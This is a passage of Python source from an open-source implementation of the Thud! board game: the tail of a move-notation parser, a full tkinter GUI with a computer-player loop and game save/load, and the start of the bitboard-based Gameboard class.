    def calc_pythagoras(a_pos, b_pos):
        """Return the Euclidean distance between two board positions."""
        a = Ply.position_to_tuple(a_pos)
        b = Ply.position_to_tuple(b_pos)
        return math.sqrt(pow(a[0] - b[0], 2) + pow(a[1] - b[1], 2))

    @staticmethod
    def parse_string(ply_notation):
        """Accepts a string indicating a full move, parses into a ply"""
        import re
        side = { 'd': 'dwarf',
                 'T': 'troll',
                 'R': 'thudstone' }
        # Groups: token, origin file, origin rank, dest file, dest rank,
        # trailing capture list ('xC1xD2...').
        REGEX_NOTATION_PLY = r"([T|d|R]) ?([A-HJ-P])([0-9]+)-([A-HJ-P])([0-9]+)(.*)"
        compiled_notation = re.compile(REGEX_NOTATION_PLY)
        m = compiled_notation.search(str(ply_notation))
        if m:
            return Ply(side.get(m.group(1)), \
                       Ply.notation_to_position(m.group(2) + m.group(3)), \
                       Ply.notation_to_position(m.group(4) + m.group(5)), \
                       list(map(Ply.notation_to_position, m.group(6).split('x')[1:])))
| {
"repo_name": "hexparrot/thudgame",
"path": "thudclasses.py",
"copies": "1",
"size": "7225",
"license": "mit",
"hash": 6730677030674622000,
"line_mean": 29.3571428571,
"line_max": 87,
"alpha_frac": 0.5031141869,
"autogenerated": false,
"ratio": 3.4836065573770494,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9430580380089164,
"avg_score": 0.011228072837577126,
"num_lines": 238
} |
"""A python3 implementation of the Thud! boardgame
"""
__author__ = "William Dizon"
__license__ = "MIT License"
__version__ = "1.8.0"
__email__ = "wdchromium@gmail.com"
from thudclasses import *
from thud import *
import copy
import tkinter
import tkinter.filedialog
import math
import re
import itertools
import random
import sys
import threading
class RepeatTimer(threading.Thread):
    """
    This borrowed class repeats at 1 second intervals to see if it is a
    computer's turn to act on behalf of the troll/dwarf.

    # Copyright (c) 2009 Geoffrey Foster
    # http://g-off.net/software/a-python-repeatable-threadingtimer-class
    """

    def __init__(self, interval, function, iterations=0, args=None, kwargs=None):
        """Call ``function(*args, **kwargs)`` every *interval* seconds.

        *iterations* <= 0 repeats until cancel().  Fix: *args* and
        *kwargs* previously defaulted to shared mutable objects
        ([] and {}), so all default-constructed timers shared state.
        """
        threading.Thread.__init__(self)
        self.interval = interval
        self.function = function
        self.iterations = iterations
        self.args = [] if args is None else args
        self.kwargs = {} if kwargs is None else kwargs
        self.finished = threading.Event()

    def run(self):
        count = 0
        while not self.finished.is_set() and (self.iterations <= 0 or count < self.iterations):
            # wait() doubles as the sleep and as a prompt exit on cancel().
            self.finished.wait(self.interval)
            if not self.finished.is_set():
                self.function(*self.args, **self.kwargs)
                count += 1

    def cancel(self):
        """Stop the timer; takes effect at the next wait/check."""
        self.finished.set()
class DesktopGUI(tkinter.Frame):
"""Implements the main desktop GUI"""
    def __init__(self, master):
        """Build the main window and initialise all per-game UI state."""
        master.title('Thud')
        self.sprites = {}  # board position -> canvas item id
        self.sprite_lifted = False  # True while a piece is being dragged
        self.review_mode = False  # True when browsing history, not playing
        self.selection_mode = 'false'  # manual-capture state: 'false'/'selecting'
        self.selected_pieces = []  # positions picked during manual capture
        self.displayed_ply = 0
        self.delay_ai = False  # guards against re-entrant AI turns
        self.compulsory_capturing = tkinter.BooleanVar()
        self.allow_illegal_play = tkinter.BooleanVar()
        self.cpu_troll = tkinter.BooleanVar()
        self.cpu_dwarf = tkinter.BooleanVar()
        self.alt_iconset = tkinter.BooleanVar()
        self.lookahead_count = 3  # AI search depth
        self.draw_ui(master)
        # Defaults: captures automatic, rules enforced, standard icons.
        self.user_notice.set("")
        self.compulsory_capturing.set(True)
        self.allow_illegal_play.set(False)
        self.alt_iconset.set(False)
    def draw_ui(self, master):
        """Loads all the images and widgets for the UI"""
        BOARD_SIZE = 600
        self.square_size = int(BOARD_SIZE / 15)  # 15x15 playable squares
        # Piece/board artwork; change_iconset() may swap these later.
        self.image_board = tkinter.PhotoImage(file='tb.gif')
        self.image_troll = tkinter.PhotoImage(file='rook.gif')
        self.image_dwarf = tkinter.PhotoImage(file='pawn.gif')
        self.image_thudstone = tkinter.PhotoImage(file='thudstone.gif')
        #notation list box and scroll bars
        self.scrollbar = tkinter.Scrollbar(master, orient='vertical')
        self.listbox = tkinter.Listbox(master, yscrollcommand=self.scrollbar.set)
        self.listbox.config(width=30, font=("Courier", 10), selectmode='single')
        self.scrollbar.config(command=self.listbox.yview)
        self.scrollbar.pack(side='right', fill='y')
        self.listbox.pack(side='right', fill='both', expand=1)
        #"status bar" frame
        # NOTE(review): the canvas and menubar are parented to the global
        # 'root', not to 'master' -- works because the app passes root in,
        # but worth confirming.
        self.canvas = tkinter.Canvas(root, width=BOARD_SIZE, height=BOARD_SIZE)
        self.canvas.pack(expand=True)
        self.clear_sprites_all()
        self.subframe = tkinter.Frame(master, height=50, borderwidth=2, relief='groove')
        self.subframe.pack(side='bottom')
        self.subframe2 = tkinter.Frame(self.subframe, height=50, borderwidth=2, relief='raised')
        self.subframe2.pack(side='right')
        #"status bar" labels for images and piece counts
        self.dwarf_count = tkinter.StringVar()
        self.troll_count = tkinter.StringVar()
        self.user_notice = tkinter.StringVar()
        self.subframe_label = tkinter.Label(master, textvariable=self.user_notice, width=80)
        self.subframe_label.pack(side='left')
        self.d = tkinter.Label(self.subframe, image=self.image_dwarf)
        self.d.pack(side='left')
        tkinter.Label(self.subframe, textvariable=self.dwarf_count).pack(side='left')
        self.t = tkinter.Label(self.subframe, image=self.image_troll)
        self.t.pack(side='left')
        tkinter.Label(self.subframe, textvariable=self.troll_count).pack(side='left')
        #playback controls
        self.subframe2_button1 = tkinter.Button(self.subframe2, text="|<<")
        self.subframe2_button1.pack(side='left')
        self.subframe2_button2 = tkinter.Button(self.subframe2, text=" < ")
        self.subframe2_button2.pack(side='left')
        self.subframe2_button3 = tkinter.Button(self.subframe2, text=" > ")
        self.subframe2_button3.pack(side='left')
        self.subframe2_button4 = tkinter.Button(self.subframe2, text=">>|")
        self.subframe2_button4.pack(side='left')
        #playback bindings
        # All four share one handler; goto_ply dispatches on event.widget.
        self.subframe2_button1.bind('<Button-1>', self.goto_ply)
        self.subframe2_button2.bind('<Button-1>', self.goto_ply)
        self.subframe2_button3.bind('<Button-1>', self.goto_ply)
        self.subframe2_button4.bind('<Button-1>', self.goto_ply)
        menubar = tkinter.Menu(root)
        root.config(menu=menubar)
        game_dropdown = tkinter.Menu(menubar)
        option_dropdown = tkinter.Menu(menubar)
        #menubar dropdowns
        menubar.add_cascade(label="Game", menu=game_dropdown)
        menubar.add_cascade(label="Options", menu=option_dropdown)
        game_dropdown.new_branch = tkinter.Menu(game_dropdown)
        game_dropdown.add_cascade(label='New',menu=game_dropdown.new_branch)
        game_dropdown.new_branch.add_command(label='Classic', command=self.newgame_classic)
        game_dropdown.new_branch.add_command(label='Koom Valley', command=self.newgame_kvt)
        game_dropdown.new_branch.add_command(label='Klash', command=self.newgame_klash)
        game_dropdown.new_branch2 = tkinter.Menu(game_dropdown)
        game_dropdown.add_cascade(label='CPU Controlled',menu=game_dropdown.new_branch2)
        game_dropdown.new_branch2.add_checkbutton(label='Troll', variable=self.cpu_troll)
        game_dropdown.new_branch2.add_checkbutton(label='Dwarf', variable=self.cpu_dwarf)
        game_dropdown.add_command(label='Open', command=self.file_opengame)
        game_dropdown.add_command(label='Save', command=self.file_savegame)
        game_dropdown.add_command(label='Exit', command=sys.exit)
        option_dropdown.add_checkbutton(label='Compulsory Capturing', \
                                        variable=self.compulsory_capturing)
        option_dropdown.add_checkbutton(label='Allow Illegal Moves', \
                                        variable=self.allow_illegal_play)
        option_dropdown.add_checkbutton(label='Alternative Iconset', \
                                        variable=self.alt_iconset, \
                                        command=self.change_iconset)
    def change_iconset(self):
        """
        Toggles between the chess piece icon set or the iconset
        for the previous thud application. Freely available source & use.

        # Copyright Marc Boeren
        # http://www.million.nl/thudboard/
        """
        try:
            if self.alt_iconset.get():
                self.image_troll = tkinter.PhotoImage(file='troll.gif')
                self.image_dwarf = tkinter.PhotoImage(file='dwarf.gif')
                self.image_thudstone = tkinter.PhotoImage(file='rock.gif')
                self.d.configure(image=self.image_dwarf)
                self.t.configure(image=self.image_troll)
            else:
                self.image_troll = tkinter.PhotoImage(file='rook.gif')
                self.image_dwarf = tkinter.PhotoImage(file='pawn.gif')
                self.image_thudstone = tkinter.PhotoImage(file='thudstone.gif')
                self.d.configure(image=self.image_dwarf)
                self.t.configure(image=self.image_troll)
        except Exception as e:
            # Missing .gif files: report, flip the checkbox back, and recurse
            # once to reload the previous (working) iconset.  The recursion
            # terminates because the reverted set loaded successfully before.
            print(e)
            self.user_notice.set("Required files not found--maintaining iconset")
            self.alt_iconset.set(not self.alt_iconset.get())
            self.change_iconset()
        # Redraw pieces so the new images take effect on the board.
        self.sync_sprites()
def goto_ply(self, event):
"""Advances or reverses game based on playback widgets"""
button_clicked = {
self.subframe2_button1: 0,
self.subframe2_button2: max(self.displayed_ply - 1, 0),
self.subframe2_button3: min(self.displayed_ply + 1, len(self.board.ply_list) - 1),
self.subframe2_button4: len(self.board.ply_list) - 1
}[event.widget]
self.play_out_moves(self.board.ply_list, button_clicked)
def update_ui(self):
"""Updates UI piece count to reflect current live pieces"""
self.dwarf_count.set("Dwarfs Remaining: " + str(len(self.board.dwarfs)))
self.troll_count.set("Trolls Remaining: " + str(len(self.board.trolls)))
self.user_notice.set("")
    def file_opengame(self):
        """Displays file dialog and then plays out game to end"""
        side = { 'd': 'dwarf',
                 'T': 'troll',
                 'R': 'thudstone' }
        # Loading a game always disables computer players.
        self.cpu_troll.set(False)
        self.cpu_dwarf.set(False)
        imported_plies = []
        # Groups: token, origin square, destination square, capture tail.
        regex_ply_notation = r"([T|d|R])([A-HJ-P][0-9]+)-([A-HJ-P][0-9]+)(.*)"
        compiled_notation = re.compile(regex_ply_notation)
        filename = tkinter.filedialog.askopenfilename(title="Open Thudgame", \
                                                      multiple=False, \
                                                      filetypes=[('thud-game files', '*.thud')])
        if not filename:
            return
        with open(filename, "r") as thud_file:
            for i,line in enumerate(thud_file):
                m = compiled_notation.search(line)
                if m:
                    p = Ply(side.get(m.group(1)), \
                            Ply.notation_to_position(m.group(2)), \
                            Ply.notation_to_position(m.group(3)), \
                            list(map(Ply.notation_to_position, m.group(4).split('x')[1:])))
                    imported_plies.append(p)
                else:
                    # Non-ply line: the starting-position header.  Infer the
                    # ruleset from its shape (presumably 40/41 pieces means a
                    # classic layout; 'dH9' marks Koom Valley -- confirm).
                    piece_list = line.split(',')
                    if len(piece_list) == 41 or len(piece_list) == 40:
                        self.board.ruleset = 'classic'
                    elif 'dH9' in piece_list:
                        self.board.ruleset = 'kvt'
                    else:
                        self.board.ruleset = 'klash'
        self.displayed_ply = 0
        # Validate by playing to the end; on success rewind to the start.
        if self.play_out_moves(imported_plies, len(imported_plies) - 1):
            self.play_out_moves(imported_plies, 0)
def file_savegame(self):
"""Opens save dialog box and exports moves to text file (.thud)"""
def tostr(token, piece_list):
'''pc_string = []
for np in piece_list:
pc_string.append(token + str(np))'''
pc_string = map(Ply.position_to_notation, piece_list)
return (','+token).join(pc_string)
filename = tkinter.filedialog.asksaveasfilename(title="Save Thudgame", \
filetypes=[('thud-game files', '*.thud')])
if not filename:
return
try:
f = open(filename, 'w')
first_string = 'd' + tostr('d',self.board.get_default_positions('dwarf', self.board.ruleset))
first_string += ',T' + tostr('T',self.board.get_default_positions('troll', self.board.ruleset))
first_string += ',R' + tostr('R',self.board.get_default_positions('thudstone', self.board.ruleset))
f.write(first_string + '\n')
for k in self.board.ply_list:
f.write(str(k) + '\n')
except:
pass
def sync_sprites(self):
"""Clears all loaded sprites and reloads according to current game positions"""
self.clear_sprites_all()
for i in self.board.trolls.get_bits():
self.create_sprite('troll', i)
for i in self.board.dwarfs.get_bits():
self.create_sprite('dwarf', i)
for i in self.board.thudstone.get_bits():
self.create_sprite('thudstone', i)
def create_sprite(self, token, position):
"""Creates a sprite at the given notation and binds mouse events"""
if token == 'troll':
sprite = self.canvas.create_image(0,0, image=self.image_troll, anchor='nw')
elif token == 'dwarf':
sprite = self.canvas.create_image(0,0, image=self.image_dwarf, anchor='nw')
elif token == 'thudstone':
sprite = self.canvas.create_image(0,0, image=self.image_thudstone, anchor='nw')
self.canvas.tag_bind(sprite, "<Button-1>", self.mouseDown)
self.canvas.tag_bind(sprite, "<B1-Motion>", self.mouseMove)
self.canvas.tag_bind(sprite, "<ButtonRelease-1>", self.mouseUp)
self.sprites[position] = sprite
self.move_sprite(sprite, position)
def move_sprite(self, sprite, position):
"""Moves a piece to destination, resetting origin square to empty"""
file, rank = Ply.position_to_tuple(position)
self.canvas.coords(sprite, \
self.square_size * (file - 1), \
self.square_size * (rank - 1))
self.sprites[position] = sprite
def clear_sprite(self, sprite):
"""Removes sprite from canvas"""
self.canvas.delete(sprite)
def clear_sprites_all(self):
"""Removes all sprites on the canvas and re-adds gameboard image"""
self.canvas.delete(self.canvas.find_all())
board = self.canvas.create_image(0, 0, image=self.image_board, anchor='nw')
self.canvas.tag_bind(board, "<Button-1>", self.boardClick)
    def newgame_classic(self):
        """Menu handler for creating a new classic-rules game."""
        self.newgame_common('classic')

    def newgame_kvt(self):
        """Menu handler for creating a new kvt (Koom Valley) game."""
        self.newgame_common('kvt')

    def newgame_klash(self):
        """Menu handler for creating a new klash game."""
        self.newgame_common('klash')
def newgame_common(self, ruleset='classic'):
"""Executes common commands for creating a new game"""
self.board = Gameboard(ruleset)
self.sync_sprites()
self.listbox.delete(0, 'end')
self.update_ui()
self.review_mode = False
    def boardClick(self, event):
        """Responds to clicks that DO not occur by sprite (used for troll materialization"""
        notation = (int(event.x // self.square_size), int(event.y // self.square_size))
        # Convert 15x15 canvas coords to the 17x17 (bordered) board index.
        position = notation[1] * self.board.BOARD_WIDTH + \
                   notation[0] + self.board.BOARD_WIDTH + 1
        # NOTE(review): 'or' binds looser than 'and', so when
        # allow_illegal_play is set the klash conditions AND the position
        # check below are skipped entirely -- presumably intentional
        # ("illegal" mode), but worth confirming.
        if self.allow_illegal_play.get() or \
           (self.board.ruleset == 'klash' and \
            self.board.turn_to_act() == 'troll' and \
            self.board.klash_trolls < 6) and \
           position in self.board.get_default_positions('troll', 'classic'):
            # Materialise a troll: origin == dest, no captures.
            ply = Ply('troll', position, position, '')
            self.board.add_troll(position)
            self.board.ply_list.append(ply)
            self.notate_move(ply)
            self.sync_sprites()
    def mouseDown(self, event):
        """This function will record the notation of all clicks
        determined to have landed on a sprite (see create_piece) """
        self.posx = event.x
        self.posy = event.y
        pickup_notation = (int(event.x // self.square_size), \
                           int(event.y // self.square_size))
        # Convert 15x15 canvas coords to the 17x17 (bordered) board index.
        self.pickup = pickup_notation[1] * self.board.BOARD_WIDTH + \
                      pickup_notation[0] + self.board.BOARD_WIDTH + 1
        if self.review_mode:
            # Browsing history: the board is read-only.
            return
        elif self.cpu_troll.get() and self.board.turn_to_act() == 'troll' or \
             self.cpu_dwarf.get() and self.board.turn_to_act() == 'dwarf':
            # A computer-controlled side is to move; ignore the human.
            return
        elif self.board.ruleset == 'kvt' and \
             self.board.ply_list and \
             self.board.ply_list[-1].token == 'troll' and \
             self.board.ply_list[-1].captured:
            # NOTE(review): Koom Valley special case -- appears to forbid
            # picking up a troll after three consecutive troll plies ending
            # in a capture; confirm against the KVT rules.
            if self.board.ply_list[-2].token == 'troll' and \
               self.board.ply_list[-3].token == 'troll' and \
               int(self.board.trolls[self.pickup]):
                return
            self.sprite_lifted = True
            self.canvas.tag_raise('current')
        elif self.selection_mode == 'selecting' or \
             self.allow_illegal_play.get() or \
             self.board.game_winner or \
             self.board.token_at(self.pickup) == self.board.turn_to_act() or \
             (int(self.board.thudstone[self.pickup]) and \
              self.board.turn_to_act() == 'dwarf' and \
              self.board.ruleset == 'kvt'):
            # Normal pickup: player grabs their own piece (or, in KVT, a
            # dwarf may grab the thudstone); drag begins.
            self.sprite_lifted = True
            self.canvas.tag_raise('current')
def mouseMove(self, event):
"""Activated only on a mouseDown-able sprite, this keeps the piece attached to the mouse"""
if self.sprite_lifted:
self.canvas.move('current', event.x - self.posx, event.y - self.posy)
self.posx = event.x
self.posy = event.y
    def mouseUp(self, event):
        """
        After piece is dropped, call logic function and execute/revert move.
        This function also handles manual selection (noncompulsory capture) logic.
        """
        dropoff_notation = (int(event.x // self.square_size),
                            int(event.y // self.square_size))
        # Convert 15x15 canvas coords to the 17x17 (bordered) board index.
        self.dropoff = dropoff_notation[1] * self.board.BOARD_WIDTH + \
                       dropoff_notation[0] + self.board.BOARD_WIDTH + 1
        if not self.sprite_lifted:
            return
        elif not self.compulsory_capturing.get():
            # Manual-capture mode: a two-phase state machine.
            if self.selection_mode == 'false':
                valid = self.board.validate_move(self.pickup, self.dropoff)
                if valid[2]:
                    # Captures are available: enter selection phase and
                    # remember the move until the player confirms it.
                    self.user_notice.set("Select each piece to be captured and click capturing piece to finish.")
                    self.selected_pieces = []
                    self.selection_mode = 'selecting'
                    self.pickup_remembered = self.pickup
                    self.dropoff_remembered = self.dropoff
                elif valid[0]:
                    # Plain legal move with nothing to capture.
                    self.execute_ply(Ply(self.board.token_at(self.pickup), \
                                         self.pickup, \
                                         self.dropoff, \
                                         []))
                else:
                    # Illegal: snap the sprite back to its origin square.
                    self.move_sprite(self.sprites[self.pickup], \
                                     self.pickup)
            elif self.selection_mode == 'selecting':
                self.user_notice.set("Piece at " + str(self.dropoff) + " selected")
                self.selected_pieces.append(self.dropoff)
                # Clicking the capturing piece's square again confirms.
                if self.dropoff == self.dropoff_remembered:
                    self.selection_mode = 'false'
                    valid = self.check_logic(Ply(self.board.token_at(self.pickup_remembered), \
                                                 self.pickup_remembered, \
                                                 self.dropoff_remembered,
                                                 self.selected_pieces))
                    if valid[0]:
                        self.execute_ply(valid[1])
                        self.board.game_winner = self.board.get_game_outcome()
                    else:
                        self.move_sprite(self.sprites[self.pickup_remembered], \
                                         self.pickup_remembered)
        else:
            # Compulsory-capture mode: validate and execute in one step.
            valid = self.check_logic(Ply(self.board.token_at(self.pickup), \
                                         self.pickup, \
                                         self.dropoff, \
                                         []))
            if valid[0]:
                self.execute_ply(valid[1])
                self.board.game_winner = self.board.get_game_outcome()
            else:
                self.move_sprite(self.sprites[self.pickup], \
                                 self.pickup)
        if self.board.game_winner != None:
            # Game over: freeze the board into review mode.
            self.review_mode = True
            self.user_notice.set(str(self.board.game_winner) + ' win!')
        self.sprite_lifted = False
    def check_logic(self, ply):
        """
        Returns the submitted PLY if move/capture is legal else,
        return None-filled Ply, which will revert attempted move on UI.
        """
        # validate_move appears to return
        # (legal_move, legal_capture, capturable_positions) -- confirm.
        result = self.board.validate_move(ply.origin, ply.dest)
        if self.allow_illegal_play.get():
            # Pretend the move is legal; treat it as a capture iff the ply
            # already carries notated captures.
            result = {
                True: (True, True, ply.captured),
                False:(True, False, [])
            }[bool(ply.captured)]
        if result[1] or result[0]:
            if self.compulsory_capturing.get():
                approved_captures = result[2]
            else:
                # Manual mode: honour only captures the player selected.
                approved_captures = set(ply.captured).intersection(set(result[2]))
            #if it would be a legal capture move, but no captures selected, invalid ply
            if not result[0] and result[1] and not approved_captures:
                return (False, Ply(None,None,None,None))
            #if a legal move, but not a legal capture, but capture is notated, invalid ply
            if result[0] and not result[1] and ply.captured:
                return (False, Ply(None,None,None,None))
            return (True, Ply(self.board.token_at(ply.origin), ply.origin, ply.dest, approved_captures))
        return (False, Ply(None,None,None,None))
def execute_ply(self, fullply):
"""Shortcut function to execute all backend updates along with UI sprites"""
for target in fullply.captured:
self.clear_sprite(self.sprites[target])
self.move_sprite(self.sprites[fullply.origin], fullply.dest)
self.board.apply_ply(fullply)
self.board.ply_list.append(fullply)
self.notate_move(fullply)
self.displayed_ply = len(self.board.ply_list) - 1
    def play_out_moves(self, ply_list, stop_at):
        """Replay ply_list from a fresh board, executing every ply up to
        index stop_at, then resync sprites and review-mode state.

        Returns False (and warns the user) when the notation contains an
        illegal ply and illegal play is disabled; True otherwise.
        """
        def is_review_mode(last_ply):
            # Review mode is active while the displayed ply is not the latest.
            if last_ply >= len(self.board.ply_list) - 1:
                return False
            return True
        def notate_append(ply):
            # Record the ply in both the model and the move listbox.
            self.board.ply_list.append(ply)
            self.notate_move(ply)
        """Go through ply list and execute each until stop_at number"""
        # Disable the AI during the replay, then reset to move zero.
        self.cpu_troll.set(False)
        self.cpu_dwarf.set(False)
        self.newgame_common(self.board.ruleset)
        for a, b in enumerate(ply_list):
            if a <= stop_at:
                valid = self.board.validate_move(b.origin,b.dest)
                if self.allow_illegal_play.get():
                    self.board.apply_ply(b)
                    notate_append(b)
                    continue
                if len(b.captured) > len(valid[2]):
                    #if game notation is broken, and displays broken ply
                    notate_append(b)
                    self.user_notice.set('Illegal move/capture attempt at move: ' + \
                                         str((a+2.0)/2.0) + \
                                         ". Enable 'allow illegal moves' to see game as notated.")
                    return False
                elif valid[0] or valid[1]:
                    #valid move or cap
                    self.board.apply_ply(b)
                    notate_append(b)
                elif not valid[0] and not valid[1] and valid[2]:
                    #materializing troll
                    self.board.add_troll(b.origin)
                    notate_append(b)
                else:
                    notate_append(b)
        self.sync_sprites()
        self.listbox.see(stop_at)
        self.displayed_ply = stop_at
        self.review_mode = is_review_mode(stop_at)
        return True
    def notate_move(self, ply):
        """Add move to the listbox of moves"""
        # NOTE(review): true division yields half-move numbers ("1.0", "1.5");
        # this matches the fractional numbering used in play_out_moves — confirm.
        ply_num = str((len(self.board.ply_list) + 1)/2).ljust(5)
        self.listbox.insert('end', ply_num + str(ply))
        # Colorize alternating lines of the listbox
        for i in range(0,self.listbox.size(),2):
            self.listbox.itemconfigure(i, background='#f0f0ff')
        # Re-binding on every call is redundant but harmless: Tk replaces
        # the previous <<ListboxSelect>> binding.
        self.listbox.bind('<<ListboxSelect>>', self.click_listbox_left)
        # Keep the newest move scrolled into view.
        self.listbox.yview_moveto(1.0)
        self.update_ui()
def click_listbox_left(self, event):
"""Retrieves the clicked ply and play_out_move till that point"""
try:
self.displayed_ply = int(self.listbox.curselection()[0])
except:
self.displayed_ply = len(self.board.ply_list) - 1
self.play_out_moves(self.board.ply_list, self.displayed_ply)
def is_cpu_turn(self):
"""
This is the function called 1/second to determine if CPU AI
should begin calculating potential moves.
"""
if self.cpu_troll.get() and self.board.turn_to_act() == 'troll' or \
self.cpu_dwarf.get() and self.board.turn_to_act() == 'dwarf' and \
not self.delay_ai and not self.review_mode and not self.board.game_winner:
self.delay_ai = True
self.user_notice.set("Computer is thinking...")
try:
ai_thread = threading.Thread(target=AIEngine.calculate_best_move(self.board, \
self.board.turn_to_act(), \
self.lookahead_count))
ai_thread.start()
ai_thread.join()
self.execute_ply(ai.decision)
self.delay_ai = False
except NoMoveException as ex:
print("{0} has no moves available.".format(ex.token))
self.delay_ai = True
finally:
self.board.game_winner = self.board.get_game_outcome()
if not self.board.game_winner:
self.user_notice.set("")
class tkinter_game:
    """Top-level driver: runs an interactive game or headless AI-vs-AI sets."""
    def simulate_set(self, trials=5):
        """Run `trials` AI-vs-AI games and print the list of winners."""
        results = []
        for i in range(trials):
            results.append(self.simulate_game())
        print(results)
    def simulate_game(self):
        """Play one full AI-vs-AI classic game; return the winning token."""
        global ui
        print('game in progress...')
        ui.newgame_classic()
        ui.cpu_troll.set(True)
        ui.cpu_dwarf.set(True)
        while not ui.board.game_winner:
            ui.is_cpu_turn()
            # Progress report every 10 plies.
            if not len(ui.board.ply_list) % 10:
                print('Ply {0}: trolls {1} to dwarf {2}'.format( \
                    len(ui.board.ply_list), \
                    len(ui.board.trolls), \
                    len(ui.board.dwarfs)))
        print('{0} win! trolls {1} to dwarf {2}'.format(ui.board.game_winner, \
            len(ui.board.trolls), \
            len(ui.board.dwarfs)))
        return ui.board.game_winner
    def play_game(self):
        """Launch the Tk UI and poll the AI every 0.2 seconds."""
        global ui
        global root
        ui.newgame_classic()
        r = RepeatTimer(.2, ui.is_cpu_turn)
        r.start()
        root.mainloop()
if __name__ == '__main__':
    # Build a fixed-size Tk window, attach the game UI, and start play.
    root = tkinter.Tk()
    root.wm_resizable(0,0)
    ui = DesktopGUI(root)
    game = tkinter_game()
    game.play_game()
    #game.simulate_set(15)
| {
"repo_name": "hexparrot/thudgame",
"path": "gui.py",
"copies": "1",
"size": "27466",
"license": "mit",
"hash": 5732989192608114000,
"line_mean": 42.4588607595,
"line_max": 113,
"alpha_frac": 0.5553411491,
"autogenerated": false,
"ratio": 3.779551396724921,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9796506196079696,
"avg_score": 0.007677269949044898,
"num_lines": 632
} |
"""A python3 implementation of the Thud! boardgame
"""
__author__ = "William Dizon"
__license__ = "MIT License"
__version__ = "1.8.0"
__email__ = "wdchromium@gmail.com"
from thudclasses import *
import copy
import math
import re
import itertools
import random
import sys
import threading
import logging
import sys
# Module-level logger for AI diagnostics; INFO and above go to stderr
# via a StreamHandler with a minimal "LEVEL: message" format.
ai_log = logging.getLogger('ai_logger')
ai_log.setLevel(logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(levelname)s: %(message)s'))
ai_log.addHandler(handler)
class Gameboard:
    def __init__(self, ruleset='classic'):
        """Set up bitboards and bookkeeping for the given ruleset
        ('classic', 'klash', or 'kvt')."""
        self.BOARD_WIDTH = Bitboard.BOARD_WIDTH
        self.ruleset = ruleset
        self.ply_list = []        # chronological list of executed plies
        self.game_winner = None   # winning token name once the game ends
        self.klash_trolls = 0     # trolls materialized so far (klash only)
        self.playable = self.get_default_board('playable', ruleset)
        self.trolls = self.get_default_board('troll', ruleset)
        self.dwarfs = self.get_default_board('dwarf', ruleset)
        self.thudstone = self.get_default_board('thudstone', ruleset)
def turn_to_act(self):
"""
Returns token of allowed player move.
This is only relevant on classic/klash since KVT
has additional rules allowing trolls to make multicaptures.
"""
return len(self.ply_list) % 2 and 'troll' or 'dwarf'
    def display(self, board):
        """Debug print: render str(bitboard) as a BOARD_WIDTH-wide grid,
        breaking a line every BOARD_WIDTH characters."""
        for i, v in enumerate(str(board)):
            if not i % self.BOARD_WIDTH: print()
            print(str(v).rjust(2), end='')
    def get_default_positions(self, token, ruleset):
        """Return an iterator of starting positions (1-D indices) for a
        given token under the given ruleset."""
        def playable():
            nonlocal ruleset
            # Build the octagonal playable area: dist_from_center[rank]
            # gives how many files either side of center are playable.
            pos = []
            if ruleset == 'klash': dist_from_center = [0,0,2,3,4,5,6,6,6,6,6,5,4,3,2,0,0]
            else: dist_from_center = [0,2,3,4,5,6,7,7,7,7,7,6,5,4,3,2,0]
            for i, v in enumerate(dist_from_center):
                if v:
                    for j in range(-v,v+1):
                        pos.append((i,(self.BOARD_WIDTH//2)+j))
            return pos
        def thudstone():
            # Center of the board in every ruleset.
            return [(8,8)]
        def troll():
            nonlocal ruleset
            return {
                'classic': [(7,7),(8,7),(9,7),
                            (7,8),      (9,8),
                            (7,9),(8,9),(9,9)],
                'kvt': [(6,2),(8,2),(10,2),
                        (5,3),(6,3),(8,3),(10,3),(11,3)],
                'klash': []
            }[ruleset]
        def dwarf():
            nonlocal ruleset
            return {
                'classic': [(6,1), (7,1), (9,1), (10,1),
                            (5,2), (11,2),(4,3), (12,3),
                            (3,4), (13,4),(2,5), (14,5),
                            (1,6), (15,6),(1,7), (15,7),
                            (1,9), (15,9),(1,10), (15,10),
                            (2,11), (14,11),(3,12), (13,12),
                            (4,13), (12,13),(5,14), (11,14),
                            (6,15), (7,15), (9,15), (10,15) ],
                'kvt': [(8, 9), (1, 10), (15, 10), \
                        (2,11), (14,11), \
                        (3,12), (13,12), \
                        (4,13), (12,13), \
                        (5,14), (11,14), \
                        (6,15), (7 ,15), (8,15), (9,15), (10,15) ],
                'klash':[(6, 2), (7, 2), (9, 2), (10, 2), \
                         (5, 3), (11,3), \
                         (3, 5), (13,5), \
                         (2, 6), (14,6), \
                         (2, 7), (14,7), \
                         (2, 9), (14,9), \
                         (2,10), (14,10),\
                         (3,11), (13,11),\
                         (5,13), (11,13),\
                         (6,14), (10,14),\
                         (7,14), ( 9,14) ]
            }[ruleset]
        notations = {
            'playable': playable(),
            'thudstone': thudstone(),
            'troll': troll(),
            'dwarf': dwarf()
        }[token]
        # Convert (file, rank) tuples to 1-D board positions.
        return map(Ply.tuple_to_position, notations)
    def get_default_board(self, board_type, ruleset='classic'):
        """
        Returns a bitboard with all the starting positions for a token/ruleset.
        This is used to increase readability, since get_default_positions
        only returns positions, not a board.
        """
        return Bitboard(self.get_default_positions(board_type, ruleset))
def occupied_squares(self):
"""
Shortcut bitboard of all squares currently occupied
"""
return self.dwarfs | self.trolls | self.thudstone
def token_at(self, position):
"""
Checks all bitboards to see which piece resides on the square.
"""
if int(self.trolls[position]):
return 'troll'
elif int(self.dwarfs[position]):
return 'dwarf'
elif int(self.thudstone[position]):
return 'thudstone'
elif int(self.playable[position]):
return 'empty'
    def add_troll(self, pos):
        """
        Klash-use only.  Adds a troll via bitboard, but also increments
        the Klash materialized-troll count (its maximum is enforced by
        the win-condition logic, not here).
        """
        self.trolls |= Bitboard([pos])
        self.klash_trolls += 1
    def apply_ply(self, ply):
        """
        Processes a ply through each bitboard: moves the acting token's
        bit from origin to dest and clears any captured enemy bits.

        Precedence note: `a & ~b | c` parses as `(a & ~b) | c`,
        i.e. clear the origin bit first, then set the destination bit.
        """
        if ply.token == 'troll':
            self.trolls = self.trolls & ~Bitboard([ply.origin]) | Bitboard([ply.dest])
            self.dwarfs = self.dwarfs & ~Bitboard(ply.captured)
        elif ply.token == 'dwarf':
            self.dwarfs = self.dwarfs & ~Bitboard([ply.origin]) | Bitboard([ply.dest])
            self.trolls = self.trolls & ~Bitboard(ply.captured)
        elif ply.token == 'thudstone':
